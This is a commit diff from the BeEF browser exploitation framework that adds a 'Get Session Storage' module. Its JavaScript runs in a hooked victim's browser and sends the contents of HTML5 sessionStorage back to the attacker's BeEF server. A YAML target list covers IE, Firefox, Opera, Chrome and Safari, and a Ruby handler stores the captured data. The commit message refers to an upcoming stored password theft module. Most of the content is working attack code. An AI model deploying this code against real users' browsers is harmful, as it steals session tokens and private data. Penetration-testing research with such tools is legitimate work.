Updated a few module names

Added mailing list signup form to the advanced demo page in preperation for the stored password theft module

modules/browser/get_session_storage/command.js

@@ -0,0 +1,20 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	if ('sessionStorage' in window && window['sessionStorage'] !== null) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "sessionStorage="+JSON.stringify(window['sessionStorage']));
+	} else beef.net.send("<%= @command_url %>", <%= @command_id %>, "sessionStorage="+JSON.stringify("HTML5 sessionStorage is null or not supported."));
+});

modules/browser/get_session_storage/config.yaml

@@ -0,0 +1,41 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        get_session_storage:
+            enable: true
+            category: "Browser"
+            name: "Get Session Storage"
+            description: "Extracts data from the HTML5 sessionStorage object."
+            authors: ["bcoles"]
+            target:
+                working:
+                    IE:
+                        min_ver: 8
+                        max_ver: latest
+                    FF:
+                        # It's actually 3.5 but min_ver only supports integers
+                        min_ver: 4
+                        max_ver: latest
+                    O:
+                        min_ver: 11
+                        max_ver: latest
+                    C:
+                        min_ver: 4
+                        max_ver: latest
+                    S:
+                        min_ver: 4
+                        max_ver: latest

modules/browser/get_session_storage/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_session_storage < BeEF::Core::Command
+  
+  # More info:
+  #   http://dev.w3.org/html5/webstorage/
+  #   http://diveintohtml5.org/storage.html
+  #
+  
+  def post_execute
+    content = {}
+    content['sessionStorage'] = @datastore['sessionStorage']
+    save content
+  end
+  
+end